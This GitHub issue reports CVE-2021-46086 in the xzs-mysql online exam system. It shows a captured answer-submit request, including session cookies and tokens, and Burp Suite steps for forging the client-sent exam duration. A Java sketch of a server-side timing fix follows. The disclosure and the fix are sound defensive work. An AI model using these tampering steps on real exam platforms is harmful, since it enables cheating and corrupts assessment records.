
CVE-2021-46086: There is a Insecure Permissions vulnerability exists in XZS · Issue #327 · mindskip/xzs-mysql

xzs-mysql >= t3.4.0 is vulnerable to Insecure Permissions. The front end of this open source system is an online examination system. The function that submits examination papers is unsafe: an attacker can use Burp Suite to modify parameters in the request and destroy real data.


[Suggested description]
An Insecure Permissions vulnerability exists in xzs-mysql. The front end of this open source system is an online examination system. The function that submits examination papers is unsafe: an attacker can use Burp Suite to modify parameters in the request and destroy real data.
Post: /api/student/exampaper/answer/answerSubmit

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/mindskip/xzs-mysql

[Affected Product Code Base]
t3.4.0

[Affected Component]
POST /api/student/exampaper/answer/answerSubmit HTTP/1.1
Host: localhost:8000
Content-Length: 135
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: 010353a5-cfe1-4fa8-9a28-0b9cfb4ca538
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
request-ajax: true
Content-Type: application/json
Origin: http://localhost:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8000/student/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1640832435; adminUserName=admin; JSESSIONID=WIBLgnVPP4rhIJU3PzYXxEwTHTA5na4PoZADiRaS; studentUserName=test002; Hm_lpvt_cd8218cd51f800ed2b73e5751cb3f4f9=1640835202
Connection: close

{
  "questionId": null,
  "doTime": 6,
  "answerItems": [
    {
      "questionId": 1,
      "content": null,
      "contentArray": [],
      "completed": false,
      "itemOrder": 1
    }
  ],
  "id": 1
}

[Attack Type]
Remote

[Impact Code execution]
false

Step 1: Open the URL http://localhost:8000/student/index.html#/paper/index and click "start answer".
The total exam time is 60 minutes. The remaining time is displayed in the upper right.
Step 2: Open the Burp Suite proxy and click the submit button to capture the request.
The value of doTime is the number of seconds between the start of the test and clicking the submit button; it can be modified to any number.
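
Because doTime arrives in the request body, the server cannot rely on it. The sketch below is an added example of the server-side fix, not code from xzs-mysql: the server records when the paper was issued and computes the elapsed time itself. The class and method names, the in-memory map and the 5-second grace value are assumptions.

```java
import java.time.Duration;
import java.time.Instant;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Hypothetical names throughout; not taken from the xzs-mysql code base.
public class ExamTimer {
    private static final long GRACE_SECONDS = 5; // assumed allowance for network latency

    // Key "userId:paperId" -> time the server handed the paper to the student.
    private final Map<String, Instant> startedAt = new ConcurrentHashMap<>();

    // Call when the student opens the paper ("start answer").
    public void start(long userId, long paperId, Instant now) {
        // putIfAbsent: reloading the page must not reset the clock.
        startedAt.putIfAbsent(userId + ":" + paperId, now);
    }

    // Call from the answerSubmit handler. Returns the doTime value to store.
    // clientDoTime is read only so a mismatch can be logged; it is never stored.
    public long submit(long userId, long paperId, long limitSeconds,
                       long clientDoTime, Instant now) {
        // remove() also stops the same attempt from being submitted twice.
        Instant start = startedAt.remove(userId + ":" + paperId);
        if (start == null) {
            throw new IllegalStateException("no running attempt for this user and paper");
        }
        long elapsed = Duration.between(start, now).getSeconds();
        if (elapsed > limitSeconds + GRACE_SECONDS) {
            throw new IllegalStateException("submitted after the time limit");
        }
        if (Math.abs(clientDoTime - elapsed) > GRACE_SECONDS) {
            System.err.printf("doTime mismatch user=%d paper=%d client=%d server=%d%n",
                    userId, paperId, clientDoTime, elapsed);
        }
        return elapsed;
    }

    public static void main(String[] args) {
        ExamTimer timer = new ExamTimer();
        Instant t0 = Instant.parse("2021-12-30T05:34:00Z"); // constructed sample time
        timer.start(42, 1, t0);
        // Constructed case: submitted after 50 minutes, request claims doTime=6.
        long stored = timer.submit(42, 1, 3600, 6, t0.plusSeconds(3000));
        System.out.println("stored doTime = " + stored);
    }
}
```

In a real deployment the start time would live in the database row for the attempt rather than in process memory, so it survives restarts and works across several application instances.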
